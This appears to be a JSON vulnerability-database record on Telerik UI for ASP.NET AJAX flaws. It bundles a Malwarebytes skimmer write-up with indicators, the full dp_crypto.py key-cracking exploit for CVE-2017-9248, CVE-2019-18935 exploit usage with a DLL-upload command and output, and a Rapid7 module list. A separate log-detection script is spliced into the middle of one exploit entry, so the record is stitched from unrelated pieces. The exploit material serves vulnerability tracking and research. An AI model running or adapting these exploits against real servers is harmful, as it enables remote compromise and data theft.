characters.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/encoding.png> \"\" )Figure 8: Data encoding process\n\nFinally, the data is exfiltrated via the same domain in a GET request where the filename is a GIF image. 
When this skimmer is loaded by default, it will also issue a GET request for the file null.gif (no exfiltration data present).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/urlpath.png> \"\" )Figure 9: Exfiltration URL build process\n\nIn order to decode data sent in an exfiltration attempt, we need to reverse this logic.\n\n * Take the blurb and create an array of elements with two strings each\n * Use the _parseInt()_ function to transform the two-character string into an integer\n * Use the String _fromCharCode()_ method to convert the Unicode number into a character\n\nHere's how we can take the URL path with encoded data (input) and run it through a piece of JavaScript to see the decoded version of it:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/decoded.png> \"\" )Figure 10: Script we wrote to decode exfiltrated data\n\n### Campaign likely started mid April\n\nThis skimming campaign likely began sometime in April 2020 as the first domain (hivnd[.]net) part of its infrastructure (31.220.60[.]108) was registered on April 10 by a threat actor using a ProtonMail email address.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/VirusTotal.png> \"\" )\n\nOSINT data from sources such as urlscan.io [shows various sites](<https://urlscan.io/search/#ip%3A31.220.60.108>) and brands were affected during this time period. 
Some of those sites already remediated the compromise.\n\nWe started contacting the remaining affected parties in the hope that they would identify the breach and take appropriate actions to harden their infrastructure.\n\n### All platforms and frameworks welcome\n\nCredit card skimming has become a popular activity for cybercriminals over the past few years, and the [increase in online shopping during the pandemic](<https://blog.malwarebytes.com/cybercrime/2020/04/online-credit-card-skimming-increases-by-26-in-march/>) means additional business for them, too.\n\nAttackers do not need to limit themselves to the most popular e-commerce platforms. In fact, any website or technology is fair game, as long as it can be subverted without too much effort. In some cases, we notice \"accidental\" compromises, where some sites get hacked and injected even though they weren't really the intended victims.\n\nMalwarebytes customers are protected against this and other credit card skimming campaigns via web protection technology available in [our desktop software](<http://www.malwarebytes.com>) and through our [Browser Guard extension](<https://www.malwarebytes.com/browserguard/>).\n\n_Thanks to [@unmaskparasites](<https://twitter.com/unmaskparasites>) for sharing additional insight on the affected websites._\n\n### Indicators of Compromise\n\n**Regex to find ASP.NET skimmer injections**\n\n_(jquery\\w+\\|\\|undefined;jquery\\w+={1,5}undefined&&)|(!window\\\\.jqv\\w+&&\\\\(jqv\\w+=function\\\\(a\\\\)\\\\{return)_\n\n**Skimmer infrastructure**\n \n \n idpcdn-cloud[.]com \n joblly[.]com \n hixrq[.]net \n cdn-xhr[.]com \n rackxhr[.]com \n thxrq[.]com \n hivnd[.]net\n \n \n 31.220.60[.]108\n\nThe post [Credit card skimmer targets ASP.NET sites](<https://blog.malwarebytes.com/threat-analysis/2020/07/credit-card-skimmer-targets-asp-net-sites/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": 
{"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-07-06T16:36:50", "type": "malwarebytes", "title": "Credit card skimmer targets ASP.NET sites", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9248"], "modified": "2020-07-06T16:36:50", "id": "MALWAREBYTES:50C9DC65EC310574BE96E803DA88D886", "href": "https://blog.malwarebytes.com/threat-analysis/2020/07/credit-card-skimmer-targets-asp-net-sites/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-08-16T08:15:29", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-01-24T00:00:00", "type": "exploitdb", "title": "Telerik UI for ASP.NET AJAX 2012.3.1308 < 2017.1.118 - Encryption Keys Disclosure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", 
"exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["2017-9248", "CVE-2017-9248"], "modified": "2018-01-24T00:00:00", "id": "EDB-ID:43873", "href": "https://www.exploit-db.com/exploits/43873", "sourceData": "# Exploit Title: Telerik UI for ASP.NET AJAX DialogHandler Dialog cracker\r\n# Filename: dp_crypto.py\r\n# Github: https://github.com/bao7uo/dp_crypto\r\n# Date: 2018-01-23\r\n\r\n# Exploit Author: Paul Taylor / Foregenix Ltd\r\n# Website: http://www.foregenix.com/blog\r\n\r\n# Version: Telerik UI for ASP.NET AJAX\r\n# CVE: CVE-2017-9248\r\n# Vendor Advisory: https://www.telerik.com/support/kb/aspnet-ajax/details/cryptographic-weakness\r\n\r\n# Tested on: Working on versions 2012.3.1308 thru 2017.1.118 (.NET 35, 40, 45)\r\n\r\n#!/usr/bin/python3\r\n\r\n# Author: Paul Taylor / Foregenix Ltd\r\n\r\n# https://github.com/bao7uo/dp_crypto/blob/master/dp_crypto.py\r\n\r\n# dp_crypto - CVE-2017-9248 exploit\r\n# Telerik.Web.UI.dll Cryptographic compromise\r\n\r\n# Warning - no cert warnings,\r\n# and verify = False in code below prevents verification\r\n\r\nimport sys\r\nimport base64\r\nimport requests\r\nimport re\r\nimport binascii\r\n\r\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\r\n\r\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\r\n\r\nrequests_sent = 0\r\nchar_requests = 0\r\n\r\n\r\ndef get_result(plaintext, key, session, pad_chars):\r\n global requests_sent, char_requests\r\n\r\n url = sys.argv[2]\r\n base_pad = (len(key) % 4)\r\n base = '' if base_pad == 0 else pad_chars[0:4 - base_pad]\r\n dp_encrypted = 
base64.b64encode(\r\n (encrypt(plaintext, key) + base).encode()\r\n ).decode()\r\n request = requests.Request('GET', url + '?dp=' + dp_encrypted)\r\n request = request.prepare()\r\n response = session.send(request, verify=False)\r\n requests_sent += 1\r\n char_requests += 1\r\n\r\n match = re.search(\"(Error Message:)(.+\\n*.+)(</div>)\", response.text)\r\n return True \\\r\n if match is not None \\\r\n and match.group(2) == \"Index was outside the bounds of the array.\" \\\r\n else False\r\n\r\n\r\ndef test_keychar(keychar, found, session, pad_chars):\r\n base64chars = [\r\n \"A\", \"Q\", \"g\", \"w\", \"B\", \"R\", \"h\", \"x\", \"C\", \"S\", \"i\", \"y\",\r\n \"D\", \"T\", \"j\", \"z\", \"E\", \"U\", \"k\", \"0\", \"F\", \"V\", \"l\", \"1\",\r\n \"G\", \"W\", \"m\", \"2\", \"H\", \"X\", \"n\", \"3\", \"I\", \"Y\", \"o\", \"4\",\r\n \"J\", \"Z\", \"p\", \"5\", \"K\", \"a\", \"q\", \"6\", \"L\", \"b\", \"r\", \"7\",\r\n \"M\", \"c\", \"s\", \"8\", \"N\", \"d\", \"t\", \"9\", \"O\", \"e\", \"u\", \"+\",\r\n \"P\", \"f\", \"v\", \"/\"\r\n ]\r\n\r\n duff = False\r\n accuracy_thoroughness_threshold = sys.argv[5]\r\n for bc in range(int(accuracy_thoroughness_threshold)):\r\n # ^^ max is len(base64chars)\r\n sys.stdout.write(\"\\b\\b\" + base64chars[bc] + \"]\")\r\n sys.stdout.flush()\r\n if not get_result(\r\n base64chars[0] * len(found) + base64chars[bc],\r\n found + keychar, session, pad_chars\r\n ):\r\n duff = True\r\n break\r\n return False if duff else True\r\n\r\n\r\ndef encrypt(dpdata, key):\r\n encrypted = []\r\n k = 0\r\n for i in range(len(dpdata)):\r\n encrypted.append(chr(ord(dpdata[i]) ^ ord(key[k])))\r\n k = 0 if k >= len(key) - 1 else k + 1\r\n return ''.join(str(e) for e in encrypted)\r\n\r\n\r\ndef mode_decrypt():\r\n ciphertext = base64.b64decode(sys.argv[2].encode()).decode()\r\n key = sys.argv[3]\r\n print(base64.b64decode(encrypt(ciphertext, key)).decode())\r\n print(\"\")\r\n\r\n\r\ndef mode_encrypt():\r\n plaintext = sys.argv[2]\r\n key = 
sys.argv[3]\r\n\r\n plaintext = base64.b64encode(plaintext.encode()).decode()\r\n print(base64.b64encode(encrypt(plaintext, key).encode()).decode())\r\n print(\"\")\r\n\r\n\r\ndef test_keypos(key_charset, unprintable, found, session):\r\n pad_chars = ''\r\n for pad_char in range(256):\r\n pad_chars += chr(pad_char)\r\n\r\n for i in range(len(pad_chars)):\r\n for k in range(len(key_charset)):\r\n keychar = key_charset[k]\r\n sys.stdout.write(\"\\b\"*6)\r\n sys.stdout.write(\r\n (\r\n keychar\r\n if unprintable is False\r\n else '+'\r\n ) +\r\n \") [\" + (\r\n keychar\r\n if unprintable is False\r\n else '+'\r\n ) +\r\n \"]\"\r\n )\r\n sys.stdout.flush()\r\n if test_keychar(keychar, found, session, pad_chars[i] * 3):\r\n return keychar\r\n return False\r\n\r\n\r\ndef get_key(session):\r\n global char_requests\r\n found = ''\r\n unprintable = False\r\n\r\n key_length = sys.argv[3]\r\n key_charset = sys.argv[4]\r\n if key_charset == 'all':\r\n unprintable = True\r\n key_charset = ''\r\n for i in range(256):\r\n key_charset += chr(i)\r\n else:\r\n if key_charset == 'hex':\r\n key_charset = '01234567890ABCDEF'\r\n\r\n print(\"Attacking \" + sys.argv[2])\r\n print(\r\n \"to find key of length [\" +\r\n str(key_length) +\r\n \"] with accuracy threshold [\" +\r\n sys.argv[5] +\r\n \"]\"\r\n )\r\n print(\r\n \"using key charset [\" +\r\n (\r\n key_charset\r\n if unprintable is False\r\n else '- all ASCII -'\r\n ) +\r\n \"]\\n\"\r\n )\r\n for i in range(int(key_length)):\r\n pos_str = (\r\n str(i + 1)\r\n if i > 8\r\n else \"0\" + str(i + 1)\r\n )\r\n sys.stdout.write(\"Key position \" + pos_str + \": (------\")\r\n sys.stdout.flush()\r\n keychar = test_keypos(key_charset, unprintable, found, session)\r\n if keychar is not False:\r\n found = found + keychar\r\n sys.stdout.write(\r\n \"\\b\"*7 + \"{\" +\r\n (\r\n keychar\r\n if unprintable is False\r\n else '0x' + binascii.hexlify(keychar.encode()).decode()\r\n ) +\r\n \"} found with \" +\r\n str(char_requests) +\r\n \" 
requests, total so far: \" +\r\n str(requests_sent) +\r\n \"\\n\"\r\n )\r\n sys.stdout.flush()\r\n char_requests = 0\r\n else:\r\n sys.stdout.write(\"\\b\"*7 + \"Not found, quitting\\n\")\r\n sys.stdout.flush()\r\n break\r\n if keychar is not False:\r\n print(\"Found key: \" +\r\n (\r\n found\r\n if unprintable is False\r\n else \"(hex) \" + binascii.hexlify(found.encode()).decode()\r\n )\r\n )\r\n print(\"Total web requests: \" + str(requests_sent))\r\n return found\r\n\r\n\r\ndef mode_brutekey():\r\n session = requests.Session()\r\n found = get_key(session)\r\n\r\n if found == '':\r\n return\r\n else:\r\n urls = {}\r\n url_path = sys.argv[2]\r\n params = (\r\n '?DialogName=DocumentManager' +\r\n '&renderMode=2' +\r\n '&Skin=Default' +\r\n '&Title=Document%20Manager' +\r\n '&dpptn=' +\r\n '&isRtl=false' +\r\n '&dp='\r\n )\r\n versions = [\r\n '2007.1423', '2007.1521', '2007.1626', '2007.2918',\r\n '2007.21010', '2007.21107', '2007.31218', '2007.31314',\r\n '2007.31425', '2008.1415', '2008.1515', '2008.1619',\r\n '2008.2723', '2008.2826', '2008.21001', '2008.31105',\r\n '2008.31125', '2008.31314', '2009.1311', '2009.1402',\r\n '2009.1527', '2009.2701', '2009.2826', '2009.31103',\r\n '2009.31208', '2009.31314', '2010.1309', '2010.1415',\r\n '2010.1519', '2010.2713', '2010.2826', '2010.2929',\r\n '2010.31109', '2010.31215', '2010.31317', '2011.1315',\r\n '2011.1413', '2011.1519', '2011.2712', '2011.2915',\r\n '2011.31115', '2011.3.1305', '2012.1.215', '2012.1.411',\r\n '2012.2.607', '2012.2.724', '2012.2.912', '2012.3.1016',\r\n '2012.3.1205', '2012.3.1308', '2013.1.220', '2013.1.403',\r\n '2013.1.417', '2013.2.611', '2013.2.717', '2013.3.1015',\r\n '2013.3.1114', '2013.3.1324', '2014.1.225', '2014.1.403',\r\n '2014.2.618', '2014.2.724', '2014.3.1024', '2015.1.204',\r\n '2015.1.225', '2015.1.401', '2015.2.604', '2015.2.623',\r\n '2015.2.729', '2015.2.826', '2015.3.930', '2015.3.1111',\r\n '2016.1.113', '2016.1.225', '2016.2.504', '2016.2.607',\r\n '2016.3.914', 
'2016.3.1018', '2016.3.1027', '2017.1.118',\r\n '2017.1.228', '2017.2.503', '2017.2.621', '2017.2.711',\r\n '2017.3.913'\r\n ]\r\n\r\n plaintext1 = 'EnableAsyncUpload,False,3,True;DeletePaths,True,0,Zmc9PSxmZz09;EnableEmbeddedBaseStylesheet,False,3,True;RenderMode,False,2,2;UploadPaths,True,0,Zmc9PQo=;SearchPatterns,True,0,S2k0cQ==;EnableEmbeddedSkins,False,3,True;MaxUploadFileSize,False,1,204800;LocalizationPath,False,0,;FileBrowserContentProviderTypeName,False,0,;ViewPaths,True,0,Zmc9PQo=;IsSkinTouch,False,3,False;ExternalDialogsPath,False,0,;Language,False,0,ZW4tVVM=;Telerik.DialogDefinition.DialogTypeName,False,0,'\r\n plaintext2_raw1 = 'Telerik.Web.UI.Editor.DialogControls.DocumentManagerDialog, Telerik.Web.UI, Version='\r\n plaintext2_raw3 = ', Culture=neutral, PublicKeyToken=121fae78165ba3d4'\r\n plaintext3 = ';AllowMultipleSelection,False,3,False'\r\n\r\n for version in versions:\r\n plaintext2_raw2 = version\r\n plaintext2 = base64.b64encode(\r\n (plaintext2_raw1 +\r\n plaintext2_raw2 +\r\n plaintext2_raw3\r\n ).encode()\r\n ).decode()\r\n plaintext = plaintext1 + plaintext2 + plaintext3\r\n plaintext = base64.b64encode(\r\n plaintext.encode()\r\n ).decode()\r\n ciphertext = base64.b64encode(\r\n encrypt(\r\n plaintext,\r\n found\r\n ).encode()\r\n ).decode()\r\n full_url = url_path + params + ciphertext\r\n urls[version] = full_url\r\n\r\n found_valid_version = False\r\n for version in urls:\r\n url = urls[version]\r\n request = requests.Request('GET', url)\r\n request = request.prepare()\r\n response = session.send(request, verify=False)\r\n if response.status_code == 500:\r\n continue\r\n else:\r\n match = re.search(\r\n \"(Error Message:)(.+\\n*.+)(</div>)\",\r\n response.text\r\n )\r\n if match is None:\r\n print(version + \": \" + url)\r\n found_valid_version = True\r\n break\r\n\r\n if not found_valid_version:\r\n print(\"No valid version found\")\r\n\r\ndef mode_samples():\r\n print(\"Samples for testing decryption and encryption functions:\")\r\n 
print(\"-d ciphertext key\")\r\n print(\"-e plaintext key\")\r\n print(\"\")\r\n print(\"Key:\")\r\n print(\"DC50EEF37087D124578FD4E205EFACBE0D9C56607ADF522D\")\r\n print(\"\")\r\n print(\"Plaintext:\")\r\n print(\"EnableAsyncUpload,False,3,True;DeletePaths,True,0,Zmc9PSxmZz09;EnableEmbeddedBaseStylesheet,False,3,True;RenderMode,False,2,2;UploadPaths,True,0,Zmc9PQo=;SearchPatterns,True,0,S2k0cQ==;EnableEmbeddedSkins,False,3,True;MaxUploadFileSize,False,1,204800;LocalizationPath,False,0,;FileBrowserContentProviderTypeName,False,0,;ViewPaths,True,0,Zmc9PQo=;IsSkinTouch,False,3,False;ExternalDialogsPath,False,0,;Language,False,0,ZW4tVVM=;Telerik.DialogDefinition.DialogTypeName,False,0,VGVsZXJpay5XZWIuVUkuRWRpdG9yLkRpYWxvZ0NvbnRyb2xzLkRvY3VtZW50TWFuYWdlckRpYWxvZywgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxNi4yLjUwNC40MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0;AllowMultipleSelection,False,3,False\")\r\n print(\"\")\r\n print(\"Ciphertext:\")\r\n print(\"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\")\r\n print(\"\")\r\n\r\n\r\ndef mode_b64e():\r\n print(base64.b64encode(sys.argv[2].encode()).decode())\r\n print(\"\")\r\n\r\n\r\ndef mode_b64d():\r\n print(base64.b64decode(sys.argv[2].encode()).decode())\r\n print(\"\")\r\n\r\n\r\ndef mode_help():\r\n print(\"Usage:\")\r\n print(\"\")\r\n print(\"Decrypt a ciphertext: -d ciphertext key\")\r\n print(\"Encrypt a plaintext: -e plaintext key\")\r\n print(\"Bruteforce key/generate URL: -k url key_length key_charset accuracy\")\r\n print(\"Encode parameter to base64: -b plain_parameter\")\r\n print(\"Decode base64 parameter: -p encoded_parameter\")\r\n print(\"\")\r\n print(\"To test all ascii characters set key_charset to: all, \" +\r\n \"for upper case hex (e.g. 
machine key) set to hex.\")\r\n print(\"\")\r\n print(\"Maximum accuracy is out of 64 where 64 is the most accurate, \" +\r\n \"accuracy of 9 will usually suffice for a hex, but 21 or more \" +\r\n \"might be needed when testing all ascii characters.\")\r\n print(\"Increase the accuracy argument if no valid version is found.\")\r\n print(\"\")\r\n print(\"Examples to generate a valid file manager URL:\")\r\n print(\"./dp_crypto.py -k http://a/Telerik.Web.UI.DialogHandler.aspx 48 hex 9\")\r\n print(\"./dp_crypto.py -k http://a/Telerik.Web.UI.DialogHandler.aspx 48 all 21\")\r\n print(\"\")\r\n\r\n\r\nsys.stderr.write(\r\n \"\\ndp_crypto by Paul Taylor / Foregenix Ltd\\nCVE-2017-9248 - \" +\r\n \"Telerik.Web.UI.dll Cryptographic compromise\\n\\n\"\r\n )\r\n\r\nif len(sys.argv) < 2:\r\n mode_help()\r\n\r\nelif sys.argv[1] == \"-d\" and len(sys.argv) == 4:\r\n mode_decrypt()\r\nelif sys.argv[1] == \"-e\" and len(sys.argv) == 4:\r\n mode_encrypt()\r\nelif sys.argv[1] == \"-k\" and len(sys.argv) == 6:\r\n mode_brutekey()\r\nelif sys.argv[1] == \"-s\" and len(sys.argv) == 2:\r\n mode_samples()\r\nelif sys.argv[1] == \"-b\" and len(sys.argv) == 3:\r\n mode_b64e()\r\nelif sys.argv[1] == \"-p\" and len(sys.argv) == 3:\r\n mode_b64d()\r\nelse:\r\n mode_help()", "sourceHref": "https://www.exploit-db.com/download/43873", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-16T06:08:08", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-18T00:00:00", "type": "exploitdb", "title": "Telerik UI - Remote Code Execution via Insecure 
Deserialization", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2019-18935", "CVE-2019-18935"], "modified": "2019-12-18T00:00:00", "id": "EDB-ID:47793", "href": "https://www.exploit-db.com/exploits/47793", "sourceData": "See the full write-up at Bishop Fox, CVE-2019-18935: https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui, for a complete walkthrough of vulnerability and exploit details for this issue (along with patching instructions).\r\n\r\nInstall\r\ngit clone https://github.com/noperator/CVE-2019-18935.git && cd CVE-2019-18935\r\npython3 -m venv env\r\nsource env/bin/activate\r\npip3 install -r requirements.txt\r\n\r\nRequirements\r\nThis exploit leverages encryption logic from RAU_crypto. The RAUCipher class within RAU_crypto.py depends on PyCryptodome, a drop-in replacement for the dead PyCrypto module. 
PyCryptodome and PyCrypto create problems when installed in the same environment, so the best way to satisfy this dependency is to install the module within a virtual environment, as shown above.\r\n\r\nUsage\r\nCompile mixed mode assembly DLL payload\r\nIn a Windows environment with Visual Studio installed, use build_dll.bat to generate 32- and 64-bit mixed mode assembly DLLs to be used as a payload during deserialization.\r\n\r\nbuild_dll.bat sleep.c\r\nUpload and load payload into application via insecure deserialization\r\nPass the DLL generated above to CVE-2019-18935.py, which will upload the DLL to a directory on the target server (provided that the web server has write permissions) and then load that DLL into the application via the insecure deserialization exploit.\r\n\r\npython3 CVE-2019-18935.py -u <HOST>/Telerik.Web.UI.WebResource.axd?type=rau -v <VERSION> -f 'C:\\Windows\\Temp' -p sleep_2019121205271355_x86.dll\r\n[*] Local payload name: sleep_2019121205271355_x86.dll\r\n[*] Destination folder: C:\\Windows\\Temp\r\n[*] Remote payload name: 1576142987.918625.dll\r\n\r\n{'fileInfo': {'ContentLength': 75264,\r\n 'ContentType': 'application/octet-stream',\r\n 'DateJson': '1970-01-01T00:00:00.000Z',\r\n 'FileName': '1576142987.918625.dll',\r\n 'Index': 0},\r\n 'metaData': {'AsyncUploadTypeName': 'Telerik.Web.UI.UploadedFileInfo, '\r\n 'Telerik.Web.UI, Version=<VERSION>, '\r\n 'Culture=neutral, '\r\n 'PublicKeyToken=<TOKEN>',\r\n 'TempFileName': '1576142987.918625.dll'}}\r\n\r\n[*] Triggering deserialization...\r\n\r\n<title>Runtime Error</title>\r\n<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>\r\n<h2> <i>Runtime Error</i> </h2></span>\r\n...omitted for brevity...\r\n\r\n[*] Response time: 13.01 seconds\r\nIn the example above, the application took at least 10 seconds to respond, indicating that the DLL payload successfully invoked Sleep(10000).\r\n\r\nThanks\r\n@mwulftange initially discovered this vulnerability. 
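Added example, not part of the exploit-db entry or the Bishop Fox tooling it describes: detection logic for the upload-then-trigger flow shown in the Usage output above, run over constructed IIS W3C log lines. What it keys on is taken from that output: two POSTs to `Telerik.Web.UI.WebResource.axd?type=rau` from one client in quick succession, the second answered with the ASP.NET "Runtime Error" page (HTTP 500) after a delay of at least the probe's Sleep(10000). The log lines, IP addresses, the `/app/` virtual directory, the 5-minute window and the 10 s threshold are assumptions for the example; the field layout is the default IIS W3C set.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs

# The RadAsyncUpload handler path, matched case-insensitively on the suffix so that
# applications hosted under a virtual directory (e.g. /app/) are still caught.
RAU_HANDLER = "telerik.web.ui.webresource.axd"

# Constructed sample log (assumption: default IIS W3C field set). The second and
# third request lines are the upload-then-trigger pair from 203.0.113.7: the trigger
# returns HTTP 500 (the Runtime Error page) after ~13 s (the Sleep(10000) probe).
# The last line is a normal upload by an authenticated browser user; it must not fire.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2020-10-20 10:00:01 10.0.0.5 GET /Default.aspx - 443 - 203.0.113.7 Mozilla/5.0 - 200 0 0 31
2020-10-20 10:00:02 10.0.0.5 POST /Telerik.Web.UI.WebResource.axd type=rau 443 - 203.0.113.7 python-requests/2.22.0 - 200 0 0 120
2020-10-20 10:00:03 10.0.0.5 POST /Telerik.Web.UI.WebResource.axd type=rau 443 - 203.0.113.7 python-requests/2.22.0 - 500 0 0 13010
2020-10-20 10:05:00 10.0.0.5 POST /app/Telerik.Web.UI.WebResource.axd type=rau 443 jdoe 198.51.100.20 Mozilla/5.0 https://intranet/upload.aspx 200 0 0 95
"""


def parse_w3c(text):
    """Yield one dict per request line, keyed by the names in the #Fields directive."""
    fields = None
    for raw in text.splitlines():
        if raw.startswith("#Fields:"):
            fields = raw.split()[1:]
        elif raw and not raw.startswith("#"):
            values = raw.split()  # IIS encodes spaces inside a field as '+'
            if fields and len(values) == len(fields):
                yield dict(zip(fields, values))


def is_rau_post(entry):
    """True for a POST to the RadAsyncUpload handler, i.e. ...WebResource.axd?type=rau."""
    stem = entry.get("cs-uri-stem", "").lower()
    query = entry.get("cs-uri-query", "-")
    if entry.get("cs-method") != "POST" or not stem.endswith(RAU_HANDLER):
        return False
    return "rau" in parse_qs("" if query == "-" else query).get("type", [])


def detect_rau_abuse(text, window=timedelta(minutes=5), slow_ms=10000):
    """Return {client_ip: [reasons]} for clients whose rau traffic matches the exploit
    flow: a POST to the handler followed within `window` by another POST that either
    fails with a 5xx (the Runtime Error page) or takes at least `slow_ms` (the Sleep()
    timing probe). A single upload on its own is never flagged."""
    per_client = defaultdict(list)
    for e in parse_w3c(text):
        if is_rau_post(e):
            ts = datetime.strptime(f"{e['date']} {e['time']}", "%Y-%m-%d %H:%M:%S")
            per_client[e["c-ip"]].append((ts, int(e["sc-status"]), int(e["time-taken"])))

    findings = {}
    for ip, events in per_client.items():
        events.sort()
        reasons = []
        for i, (ts, status, taken) in enumerate(events):
            prior = [p for p in events[:i] if ts - p[0] <= window]
            if not prior:
                continue  # no earlier upload in the window: nothing to chain to
            if status >= 500:
                reasons.append(f"rau POST at {ts:%H:%M:%S} returned {status} after {len(prior)} earlier rau POST(s)")
            if taken >= slow_ms:
                reasons.append(f"rau POST at {ts:%H:%M:%S} took {taken} ms (threshold {slow_ms} ms)")
        if reasons:
            findings[ip] = reasons
    return findings


if __name__ == "__main__":
    for ip, reasons in detect_rau_abuse(SAMPLE_LOG).items():
        print(ip)
        for reason in reasons:
            print("  -", reason)
```

The 500 on its own is weak evidence (any malformed rauPostData produces one), and a slow response on its own is noise on a busy server; requiring an earlier rau POST from the same client inside the window is what ties the two observations to the upload-then-load sequence. Lower `slow_ms` if you expect a payload that does not sleep, and treat a non-browser User-Agent on the handler as a secondary signal rather than a condition.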
@bao7uo wrote all of the logic for breaking RadAsyncUpload encryption, which enabled manipulating the file upload configuration object in rauPostData and subsequently exploiting insecure deserialization of that object.\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47793.zip", "sourceHref": "https://www.exploit-db.com/download/47793", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2020-10-28T04:47:53", "description": "\n\nMetasploit keeping that developer awareness rate up.\n\nThanks to [mr_me](<https://github.com/stevenseeley>) & [wvu](<https://github.com/wvu-r7>), SharePoint is an even better target to find in your next penetration test. The newly minted module can net you a shell and a copy of the server's config, making that report oh so much more fun.\n\nLike to escape the sandbox? WizardOpium has your first taste of freedom. Brought to you by [timwr](<https://github.com/timwr>) and friends through Chrome, [this module](<https://github.com/rapid7/metasploit-framework/blob/4fb0c4ac8ab89575c4358d2369d3650bc3e1c10d/modules/exploits/multi/browser/chrome_object_create.rb>) might be that push you need to get out onto solid ground.\n\n## New modules (4)\n\n * [Login to Another User with Su on Linux / Unix Systems](<https://github.com/rapid7/metasploit-framework/pull/14179>) by [Gavin Youker](<https://github.com/youkergav>)\n * [Microsoft SharePoint Server-Side Include and ViewState RCE](<https://github.com/rapid7/metasploit-framework/pull/14265>) by [wvu](<https://github.com/wvu-r7>) and [mr_me](<https://github.com/stevenseeley>), which exploits [CVE-2020-16952](<https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952-microsoft-sharepoint-remote-code-execution-vulnerabilities?referrer=wrapup>)\n * [Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization](<https://github.com/rapid7/metasploit-framework/pull/14229>) by [Alvaro 
